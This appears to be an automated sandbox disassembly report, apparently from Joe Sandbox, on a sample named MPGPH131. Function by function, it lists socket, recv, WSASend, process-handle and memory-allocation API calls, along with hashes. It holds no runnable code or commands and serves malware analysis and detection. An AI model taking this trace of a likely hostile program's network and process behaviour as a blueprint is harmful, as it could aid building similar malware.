Instruction ID: d3f3f8a63ac02c8ff0457c9edaca4e9d9848a01bee70ee05101bcf4be828cf60
Opcode Fuzzy Hash: b0741232f62294ee7c76ea7234fdb84e32d0b0c94cc463ad72419914e2c9c994
Instruction Fuzzy Hash: 2D6160B4E01215DFCF65CF98C8A4AADFBF0BF48355F1482AAD585AB211C3309A81DF91

Function 0058EC20 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 260
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32(00000320,0000FFFF,00001006,?,00000008), ref: 0058ECC6
recv.WS2_32(?,00000004,00000002), ref: 0058ECE1
WSAGetLastError.WS2_32 ref: 0058ECE5
recv.WS2_32(00000000,0000000C,00000002,0000000C), ref: 0058ED4E
recv.WS2_32(00000000,0000000C,00000008), ref: 0058ED6F
setsockopt.WS2_32(0000FFFF,00001006,?,00000008,?), ref: 0058EDEB
recv.WS2_32(00000000,?,00000008), ref: 0058EE0C

Part of subcall function 0058DB60: WSAStartup.WS2_32 ref: 0058DB8A
Part of subcall function 0058DB60: getaddrinfo.WS2_32(?,?,?,50500), ref: 0058DC0C
Part of subcall function 0058DB60: socket.WS2_32(?,?,?), ref: 0058DC2D
Part of subcall function 0058DB60: connect.WS2_32(00000000,?,?), ref: 0058DC41
Part of subcall function 0058DB60: closesocket.WS2_32(00000000), ref: 0058DC4D
Part of subcall function 0058DB60: FreeAddrInfoW.WS2_32(?), ref: 0058DC5A
Part of subcall function 0058DB60: WSACleanup.WS2_32 ref: 0058DC60

recv.WS2_32(?,00000004,00000008), ref: 0058F033
Sleep.KERNELBASE(00000001), ref: 0058F09E
Sleep.KERNELBASE(00000064), ref: 0058F0AC
__Mtx_unlock.LIBCPMT ref: 0058F211

Strings

50500, xrefs: 0058EC75

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: recv$Sleepsetsockopt$AddrCleanupErrorFreeInfoLastMtx_unlockStartupclosesocketconnectgetaddrinfosocket
String ID: 50500
API String ID: 1335176318-2230786414
Opcode ID: 7a95452be8162fa7045812c26332ed3c760b804d3ef82751955d1b3e08b761e2
Instruction ID: e815da0b8745a4523305507f403edeecbc16e5074be9bf3367977a054ed3e852
Opcode Fuzzy Hash: 7a95452be8162fa7045812c26332ed3c760b804d3ef82751955d1b3e08b761e2
Instruction Fuzzy Hash: 88B1BF31D00259DFEB24EBA8CC45BADBBB6FB45310F248219E945AB292D770A985CF50

Function 0058DB60 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 92
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 0058DB8A
getaddrinfo.WS2_32(?,?,?,50500), ref: 0058DC0C
socket.WS2_32(?,?,?), ref: 0058DC2D
connect.WS2_32(00000000,?,?), ref: 0058DC41
closesocket.WS2_32(00000000), ref: 0058DC4D
FreeAddrInfoW.WS2_32(?), ref: 0058DC5A
WSACleanup.WS2_32 ref: 0058DC60
FreeAddrInfoW.WS2_32(?), ref: 0058DC75

Strings

50500, xrefs: 0058DBE8

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AddrFreeInfo$CleanupStartupclosesocketconnectgetaddrinfosocket
String ID: 50500
API String ID: 448659506-2230786414
Opcode ID: 71c2dfe965736fb8724f25d7adb44225312b6f1d8b3fa28f41d294ecadd26a87
Instruction ID: a52701d7bfc6585b2b9b6cbe7c7c4f636c4e0ae16b54ff5062cd3c14212df4c3
Opcode Fuzzy Hash: 71c2dfe965736fb8724f25d7adb44225312b6f1d8b3fa28f41d294ecadd26a87
Instruction Fuzzy Hash: 533180725047049BD7209F28EC48A2ABBF5FB89734F04471DF8A9A22E0D3719D448BA2

Function 0058E060 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 332
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(Ws2_32.dll,?,?,?,?,006747E8,00000000,00000000,-006A65B0), ref: 0058E386
GetProcAddress.KERNEL32(00000000,89988B80), ref: 0058E391
WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,006747E8,00000000,00000000,-006A65B0), ref: 0058E3A6

Strings

131, xrefs: 0058F2C8
50500, xrefs: 0058EC75
Ws2_32.dll, xrefs: 0058E37D

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcSend
String ID: 131$50500$Ws2_32.dll
API String ID: 2819740048-3512819870
Opcode ID: 79abfe181a1b7f47e359e24d0f1e7fe03b7a4d0757b7eb4621063c4ec8951961
Instruction ID: 773a88c789b21797d8cd8a8a6ca378d48c499a15bb34424cad8719558783aeba
Opcode Fuzzy Hash: 79abfe181a1b7f47e359e24d0f1e7fe03b7a4d0757b7eb4621063c4ec8951961
Instruction Fuzzy Hash: 04D1DF30A04248DFDB14DFA8CC55BADBFB5BF46310F684258D855BB292EB709886CB91

Function 00662F0C Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00662622: GetConsoleOutputCP.KERNEL32(FAAA2064,00000000,00000000,?), ref: 00662685

WriteFile.KERNELBASE(?,00000000,00656AF7,?,00000000,00000000,00000000,?,00000000,?,0064C023,00656AF7,00000000,0064C023,?,?), ref: 00663091
GetLastError.KERNEL32(?,00656AF7,00000000,?,0064C023,?,00000000,00000000), ref: 0066309B

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 27c8a632ea7d98b2da3662cb89c9c5c226481453b3700f3a444dd9015b3e9162
Instruction ID: 5b5f11e3b0590da269495c1a731a8f18ceba35c0f1e33cc677a4cf5ed1ee4aff
Opcode Fuzzy Hash: 27c8a632ea7d98b2da3662cb89c9c5c226481453b3700f3a444dd9015b3e9162
Instruction Fuzzy Hash: 9661C671D0411AAFDF11DFA8C844AEEBBBABF19304F140149E904AB352D772DA55DB60

Function 00662582 Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00662469,00000000,CF830579,006A1148,0000000C,00662525,0065662D,?), ref: 006625D8
GetLastError.KERNEL32(?,00662469,00000000,CF830579,006A1148,0000000C,00662525,0065662D,?), ref: 006625E2

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: ac139754206ef6a4f04e01a0d79e839cece2d15668b25600798fdd21571bf296
Instruction ID: 8e4e21666f555b46426f551e16525f4de65adcc631d7b759068d580670940aa6
Opcode Fuzzy Hash: ac139754206ef6a4f04e01a0d79e839cece2d15668b25600798fdd21571bf296
Instruction Fuzzy Hash: C2116B336005515BC73463749C797BD674B9B87734F24030DFD0A8B2D2DE7198C28256

Function 0065BACC Relevance: 3.1, APIs: 2, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,006A0E00,0064C023,00000002,0064C023,00000000,?,?,?,0065BBD6,00000000,?,0064C023,00000002,006A0E00), ref: 0065BB08
GetLastError.KERNEL32(0064C023,?,?,?,0065BBD6,00000000,?,0064C023,00000002,006A0E00,00000000,0064C023,00000000,006A0E00,0000000C,00656BCE), ref: 0065BB15

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: e250e0b9294de1fbebb30158c0191d8da4f10ea1f4cb8114ed21abc28b3e9f32
Instruction ID: 23aa52e679b98d3520941f79751565a15ca390d55e27bdc0cdd5aea59c04b9d7
Opcode Fuzzy Hash: e250e0b9294de1fbebb30158c0191d8da4f10ea1f4cb8114ed21abc28b3e9f32
Instruction Fuzzy Hash: 0101C436610155AFCB09CF69DC45DEE7B2BEB85331F240208FC119B291EBB1EE918B90

Function 0066379C Relevance: 2.6, APIs: 2, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,0065ACB4,006648E0,?,?,0064E0EB,?,?,?,?,?,00572D8D,0064B16C,?,?), ref: 006637A0
SetLastError.KERNEL32(00000000,?,?,0064B16C), ref: 00663842

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 6f4dde4b84df62f37385985520f4f520d071173ade7713dc5f4d0c228603d765
Instruction ID: 52aabf3222524b7159fa590989bd4e0d76f0349f944a8c0e62529af621f49dcc
Opcode Fuzzy Hash: 6f4dde4b84df62f37385985520f4f520d071173ade7713dc5f4d0c228603d765
Instruction Fuzzy Hash: 8A1121702042316ED7923BB59CC6EAB2A5FAF01778B10413CF104863A3DF528F0546A8

Function 005DBA20 Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 005DBB71

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
Instruction ID: 6529fcfbb46cf998987f74c5b43e0019763d66c8205c738b590a08474c14a440
Opcode Fuzzy Hash: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
Instruction Fuzzy Hash: 40412372900109DBDB25DF6CD8816AEBBA6FF44310F16066BF804EB345D730DE1087A5

Function 0064CD02 Relevance: 1.6, APIs: 1, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00571FDE

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 322cf9d13eedde78652f7e60c3ec681ba757b9497fc64ac9a7ad59a43de402ea
Instruction ID: 6516bdd202d6418eafa5fb23458baac5ef8d701f744f5dda222c81d0f3a023c0
Opcode Fuzzy Hash: 322cf9d13eedde78652f7e60c3ec681ba757b9497fc64ac9a7ad59a43de402ea
Instruction Fuzzy Hash: 20012B3580020D67C714AFA8EC014897FAEDF02360B508239F9189B540FB70E590C7E5

Function 00663E63 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,0064B16C,?), ref: 00663EA4

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 04e187e810cf988ca7cc8c0e6407d37c740b43530f1fce4aef8645a3d689e945
Instruction ID: 081253c19989c5f338ce8f7533c75637d4145492a353ffa63e3000233f55b81d
Opcode Fuzzy Hash: 04e187e810cf988ca7cc8c0e6407d37c740b43530f1fce4aef8645a3d689e945
Instruction Fuzzy Hash: 8DF0B432A00235669B326F728D05B9B374BAF41761B154117BC059A380CB72FE0486F4

Function 0066489D Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 006648CF

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 20874c1e6fc91679fa91d72bfc8f65db2df595145dc37c2741a4156bf62e72f1
Instruction ID: eb9db9aeaed8543a4721170cfceb6434afb23abf1391c4ac7680d72ff7f1d231
Opcode Fuzzy Hash: 20874c1e6fc91679fa91d72bfc8f65db2df595145dc37c2741a4156bf62e72f1
Instruction Fuzzy Hash: 8EE06D311026A19AE72177A69C05BEB368B9F823B1F15133EAC45A7691DF60DC0082E5

Function 00829B8C Relevance: 1.3, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00829BB7

Memory Dump Source

Source File: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmp, Offset: 006D2000, based on PE: true

Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 788cc3e1962191186ccee4a8cb5f4d0540ef6b6224f83d3fc9c4b19a6febbf38
Instruction ID: c0821fa9178ffc9cd42eaffe433bd1444831d6ee6a7c36ab13f279e4cf067211
Opcode Fuzzy Hash: 788cc3e1962191186ccee4a8cb5f4d0540ef6b6224f83d3fc9c4b19a6febbf38
Instruction Fuzzy Hash: 03E0EC7530012C9BDB10CE4CE844B5B339EF78A330F108011F549D7605C235EC519771

Non-executed Functions

Function 0057A720 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 324libraryloadersynchronizationCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?), ref: 0057A7CD
GetProcAddress.KERNEL32(00000000,?), ref: 0057A7DD
GetModuleHandleA.KERNEL32(?), ref: 0057A845
GetProcAddress.KERNEL32(00000000,?), ref: 0057A84C
OpenProcess.KERNEL32(00000040,00000000,?), ref: 0057A858
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000), ref: 0057A8D1
CloseHandle.KERNEL32(?), ref: 0057A908
CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0057A98D
ResetEvent.KERNEL32(00000000), ref: 0057A996
CreateThread.KERNEL32(00000000,00000000,0057A5B0,?,00000000,00000000), ref: 0057A9BA
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 0057A9C6
RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 0057AA0C
CloseHandle.KERNEL32(?), ref: 0057AA4A
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000001), ref: 0057AA56
CloseHandle.KERNEL32(?), ref: 0057AA71
CloseHandle.KERNEL32(00000000), ref: 0057AAD5

Strings

File, xrefs: 0057A93C

Memory Dump Source

Source File: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
